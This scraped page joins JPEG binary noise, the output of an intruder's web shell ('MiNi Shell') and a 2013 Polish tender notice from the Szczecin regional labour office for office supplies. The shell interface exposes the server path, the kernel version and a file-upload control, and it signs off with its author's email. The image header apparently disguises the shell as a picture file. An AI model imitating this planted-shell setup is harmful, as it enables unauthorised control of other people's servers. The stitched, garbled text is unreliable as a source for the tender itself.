JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130712/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130712/272624-N-2013.html

<p class="kh_header"><b>Szczecin: Dostawa sprzętu i materiałów biurowych na potrzeby Wojewódzkiego Urzędu Pracy w Szczecinie</b><br>
<b>Numer ogłoszenia: 272624 - 2013; data zamieszczenia: 12.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Urząd Pracy w Szczecinie , ul. Mickiewicza 41, 70-383 Szczecin, woj. zachodniopomorskie, tel. 091 4256100, faks 091 4256103.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu i materiałów biurowych na potrzeby Wojewódzkiego Urzędu Pracy w Szczecinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa sprzętu i materiałów biurowych na potrzeby Wojewódzkiego Urzędu Pracy w Szczecinie, obejmująca swoim zakresem: Część I papier ksero, niszczarka, koperty; Część II materiały biurowe (m. in. długopisy, koperty ,temoerówki, zakładki), kalkulatory, telefony bezprzewodowe, papier ksero; Część III kalklatory, materiały biurowe (m. in.pióra ołówki, spinacze,segregatory, markery, zakładki)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-0, 30.10.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania przez Wykonawcę ww. warunku, zamawiający żąda następujących dokumentów: Oświadczenia o braku podstaw do wykluczenia Wykonawcy z postępowania, zgodnie z wzorem oświadczenia stanowiącym Formularz nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania przez Wykonawcę ww. warunku, zamawiający żąda następujących dokumentów: Oświadczenia o braku podstaw do wykluczenia Wykonawcy z postępowania, zgodnie z wzorem oświadczenia stanowiącym Formularz nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania przez Wykonawcę ww. warunku, zamawiający żąda następujących dokumentów: Oświadczenia o braku podstaw do wykluczenia Wykonawcy z postępowania, zgodnie z wzorem oświadczenia stanowiącym Formularz nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania przez Wykonawcę ww. warunku, zamawiający żąda następujących dokumentów: Oświadczenia o braku podstaw do wykluczenia Wykonawcy z postępowania, zgodnie z wzorem oświadczenia stanowiącym Formularz nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania przez Wykonawcę ww. warunku, zamawiający żąda następujących dokumentów: Oświadczenia o braku podstaw do wykluczenia Wykonawcy z postępowania, zgodnie z wzorem oświadczenia stanowiącym Formularz nr 4 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwa osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów. 
Tylko w sytuacjach określonych w Części II w Rozdziale I pkt 1.5 lub w przypadku składania oferty wspólnej.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian istotnych postanowień zawartej umowy 
w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, 
w przypadku wystąpienia, co najmniej jednej z okoliczności wymienionych poniżej, 
z uwzględnieniem podawanych warunków ich wprowadzenia:
1. Zmiana terminu realizacji przedmiotu umowy: 
Zmiany będące następstwem okoliczności leżących po stronie Zamawiającego w szczególności: przedłużające się czynności prowadzące do wyboru najkorzystniejszej oferty w przedmiotowym postępowaniu.
W przypadku wystąpienia powyższej okoliczności, termin wykonania umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wup.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Urząd Pracy w Szczecinie, ul. A. Mickiewicza 41, 70-383 Szczecin, pok. 039.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.07.2013 godzina 11:30, miejsce: Wojewódzki Urząd Pracy w Szczecinie, ul. A. Mickiewicza 41, 70-383 Szczecin, pok. 036-Kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I- budżet WUP.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Papier ksero: format A4 gramatura: 80g/m2, 500 arkuszy w ryzie. Pakowane po 5 ryz w kartonie. Kolor: biały. 100 ryz
Koperty C5 samoklejące: rozmiar : ok. 162 x ok. 229 mm. Kolor: biały. 3000 szt.
Niszczarka do papieru, płyt CD, o parametrach nie gorszych niż: przeznaczona do średniego natężenia pracy - do ok. 400 - 600 arkuszy dziennie. Niszczarka mogąca niszczyć zarówno dokumenty, jak i zszywki, małe spinacze biurowe oraz karty kredytowe. Niszcząca jednorazowo nie mniej niż 10 kartek o gramaturze 80g, tnąca na paski max. 6 mm, poziom bezpieczeństwa DIN 2. Szerokość wejścia max. 250 mm. Auto start/stop - fotokomórka, funkcja cofania. Kosz o pojemności ok. 25 litrów. Gwarancja: 1 rok na całość urządzenia, 5 lat na noże tnące. Diody informacyjne działania. Szczelina do niszczenia kart kredytowych. Blokada bezpieczeństwa zapobiegająca przypadkowemu uruchomieniu urządzenia. Ergonomicznie umieszczona szczelina niszczenia dokumentów. Wymiary: ok. 450x370x290 mm (+/- 20%). 1 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-0, 30.10.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II FGŚP - VII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przekładki kartonowe  do segregatorów 1/3 A4 kolor żółty 1 op zawiera 100 szt.	5 op.
Przekładki kartonowe  do segregatorów 1/3 A4 kolor niebieski 1 op. zawiera 100 szt.	5 op.
Karton archiwizacyjny- wykonany z twardej tektury falistej białej, przeznaczony do przechowywania dokumentów w formacie  A4, duże etykiety do opisu zawartości na grzbietach, wieko posiada dodatkowe zapięcie zabezpieczające dokumenty przed wypadnięciem. Wymiary 35x25cm, szerokość grzbietu 10cm.	200 szt.
Klipsy archiwizacyjne- dwuczęściowe, plastikowe przeznaczone do archiwizacji dokumentów, umożliwia szybkie i łatwe przeniesienie dokumentów z segregatorów, kolor biały, pojemność do 580 kartek, pakowane po 100szt.	2 op.
Zakładki indeksujące, samoprzylepne  opakowanie zawierające 5 bloczków o wymiarach 15x50mm, w  5 neonowych kolorach po 100 zakładek każda	46 szt.
Papier ksero A4- papier uniwersalny o gramaturze co najmniej 80g/m2, przeznaczony do kopiarek, drukarek laserowych i atramentowych oraz faksów, białość średnia min. 165% wg skali białości CIE, ryza 500 arkuszy, format A4, nieprzezroczystość min. 91%, kolor biały	400 ryz
Koperta biała o wymiarach 110x220, z oknem prawym, samoklejąca, umiejscowienie okienka: 20mm od prawej strony i 15mm od dołu wymiar okienka:90x45mm, gramatura 80g/m2 , pakowane po 1000szt.	5 op.
Koperta rozszerzana 290x400x50  biała  Nc Tektura HK 20 szt.
koperta B-4 biała ,rozmiar : 250x353 mm,  samoklejąca,  pakowane 50 szt.	4 op.
koperta biała C-6 o wymiarach 114x162, samoklejąca, pakowana po 100szt.	2 op.
Telefon bezprzewodowy z menu w j. polskim, identyfikacją rozmówcy, podświetlanym wyświetlaczem, słuchawką głośnomówiącą, książką telefoniczną na 50 wpisów, funkcja daty i czasu, automatyczne powtarzanie numerów, regulacja głośności słuchawki, min. 5 melodii dzwonka, W zestawie: słuchawka, baza, zasilacz, przewód telefoniczny, instrukcja w j. polskim; gwarancja min. 12 m-cy; kolor czarny.	2 szt.
Notatniki A4 - 100 str. w kratkę, papier o wysokiej gramaturze, nie przebijający pisma. 	4 szt.
Kalkulator - 12 pozycyjny, wyprofilowany wyświetlacz, funkcje: klawisz cofania, klawisz podwójnych zer, obliczanie marzy i sumy całkowitej, klawisz zmiany znaku +/-, zaokrąglanie wyników, liczenie z dokładnością do 4 miejsc po przecinku, podwójna pamięć, podwójne zasilanie. Wymiary 138x150x35mm. Kolor czarny.	2 szt.
Nożyczki - ergonomiczne, wielkość 20-22 cm, trwałe ostrze ze stali nierdzewnej, uchwyt wyprofilowany dla prawo i leworęcznych osób, ergonomiczny i miękki uchwyt odporny na pęknięcia.	2 szt.
Teczka do podpisu - wykonana z kartonu pokrytego skóropodobnym tworzywem w kolorze zielonym. Grzbiet teczki wykonany harmonijkowo - łączenie okładki z blokiem wzmocnione nitami . Kartki wewnętrzne kartonowe białe z dziurkami w celu pokazania zawartości teczki. Teczka zawiera 20 kartek. Na okładce znajduje się okienko umożliwiające opis zawartości teczki.10 szt.
Zakładki indeksujące wykonane z wysokiej jakości folii PET z nałożonym klejem; możliwość wielokrotnego przyklejenia do różnego rodzaju powierzchni; po odlepieniu, nie pozostawia śladu; można na nich pisać; w jednym komplecie powinno znajdować się:   5 bloczków w 5 neonowych kolorach o wymiarach 12mmx45mm,  po minimum 25 zakładek w każdym bloczku. 46 szt.
Dziurkacz oraz ogranicznik formatu wykonany z metalu; zdolność dziurkowania do 35 kartek; kolor  czarny; łatwy do zdejmowania pojemnik na ścinki; 2 szt.
Zszywki biurowe 24/6 srebrne, pakowane po 1000 szt. - 20 szt.
Zszywki biurowe 23/8 srebrne, pakowane po 1000 szt. - 10 szt.
Długopis automatyczny w przezroczystej obudowie, z gumowym uchwytem w kolorze tuszu, z wymiennym wkładem, wkład z tuszem olejowym, wodoodpornym, w kolorze niebieskim, grubość linii pisania 0,32mm, długość linii pisania 1600m - 30 szt.
Temperówka dwuotworowa do standardowych i grubych ołówków, posiadająca duży pojemnik na odpadki.	2 szt.
Korektor w myszce, taśma korygująca odporna na światło, długość taśmy 12m, szerokość 5mm, precyzyjny podajnik taśmy, przezroczysta obudowa - 16 szt.
Gumka do ścierania, przeznaczona do stosowania na papierze i folii, nie niszczy ścieranej powierzchni, wielkość średnia	10 szt.
Kostka papierowa sklejona wzdłuż jednego boku, 350 kolorowych karteczek, wymiary 8,5x8,5x3,5cm - 3 szt.
Koperta biała, C-4 229x324mm, samoklejąca, pakowana po 100 szt. - 3 op.
Koperta biała C-6 o wymiarach 110x220, z oknem prawym, samoklejąca, umiejscowienie okienka: 20mm od prawej strony i 15mm od dołu wymiar okienka:90x45mm, gramatura 80g/m2 , pakowane po 1000 szt. - 4 op.
Koperta biała C-5 o wymiarach 162x229, samoklejąca, pakowana po 500 szt. - 3 op.
Koperta B-4 biała, rozmiar : 250x353 mm,  samoklejąca,  pakowane 50 szt. (bez rozszerzenia) - 3 op.
Koperta biała C-6 o wymiarach 114x162, samoklejąca, pakowana po 100 szt. - 2 op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-0, 30.10.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III FGŚP - I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakładki indeksujące w podajniku, siedmiokolorowe neonowe zakładki indeksujące wykonane z transparentnej folii. Rolka nie mniej niż 10m klejonego papieru. Można po nich pisać, nie niszczą kartek po odklejeniu. Podajnik ułatwia odrywanie zakładek i urywanie dowolnej długości papieru. - 3 szt.
Wkład wymienny do podajnika z poz.1. Rolka samoprzylepnego papieru o długości nie mniej niż 10m. Siedmiokolorowe neonowe zakładki indeksujące wykonane z transparentnej foli. - 3 szt.
Marker do tablicy suchościeralnej w kolorze czerwonym - 2 szt.
Temperówka dwuotworowa do standardowych i grubych ołówków, posiadająca duży pojemnik na odpadki - 2  szt.
Folia do faxu Panasonic KX-FC268 -	2 szt.
Etykiety adresowe samoprzylepne do zastosowań w drukarkach atramentowych, laserowych i kserokopiarkach, format arkusza A4. Format pojedynczej etykiety: 105mm x 37 mm, ilość kolumn 2, ilość wierszy 8.	 - 100 arkuszy
Teczka zapinana na gumkę, w formacie A4, karton lakierowany, różne kolory- opakowanie zawiera 10 szt. -1 op.
Spinacze biurowe metalowe, okrągłe, małe, rozmiar 28 mm, pakowane po 100 szt. - 3 op.
Ołówek drewniany sześciokątny HB z gumką. Grafit wykonany z wysokiej jakości materiałów.	- 10 szt.
Kalkulator  biurowy o parametrach: klawisz podwójnego zera, wyświetlacz LCD - 12, pierwiastek kwadratowy, klawisz cofania, znak +/-, zaokrąglanie liczb, zapis walutowy, znacznik części tysięcznej, pamięć, procenty, liczenie z dokładnością do 4 miejsc po przecinku, kolor czarny.	- 1 szt.
Papier do drukarki o bieli 4 gwiazdek , CIE 161, gramatura  80 g/m 2 - 30 ryz
Przekładki wąskie wykonane z grubego kartonu ekologicznego 190g/m2, format 240x105 mm. W opakowaniu 100 szt. w kolorze niebieskim.	- 1 op.
Rysiki do ołówków automatycznych - 0,5 mm HB w opakowaniu nie mniej niż 12 rysików. - 3 op.
Zestaw magnesów do powierzchni magnetycznych (tablice suchościeralne) -  10 szt. (w 1 opakowaniu)  magnesów w różnych kolorach. - 1 op.
Klej uniwersalny, szybkoschnący, 2 g - 4 szt.
Nożyczki, wykonane ze stali nierdzewnej o bardzo wysokiej jakości , cechują się niezwykle wytrzymałą rączką odporną na pęknięcia i odpryski , uniwersalne - do cięcia papieru, kartonu, tektury, zdjęć, taśmy samoprzylepnej, ergonomicznym kształtem, rozmiar 20,5 cm	 - 4 szt.
Gąbka do tablicy suchościeralnej z wymiennymi wkładami. - 1 szt.
Pióro kulkowe  ze skuwką,  kolor: czarny lub niebieski, uchwyt ze stali nierdzewnej, wykończenie chromowane, klips w formie strzały, wyposażony w standardowy wkład koloru niebieskiego. - 3 szt.
Standardowy wkład do pióra kulkowego  w kolorze niebieskim (do pióra kulkowego z pozycji 18)	6 szt.
Etui na przybory piśmienne, pojedyncze, etui wykonane ze skóry. 	- 1 szt.
Segregator A5  wykonany z twardej tektury, szerokość grzbietu 75 mm, mechanizm dźwigniowy z dociskiem, metalowe oczko grzbietowe - 2 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-0, 30.10.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com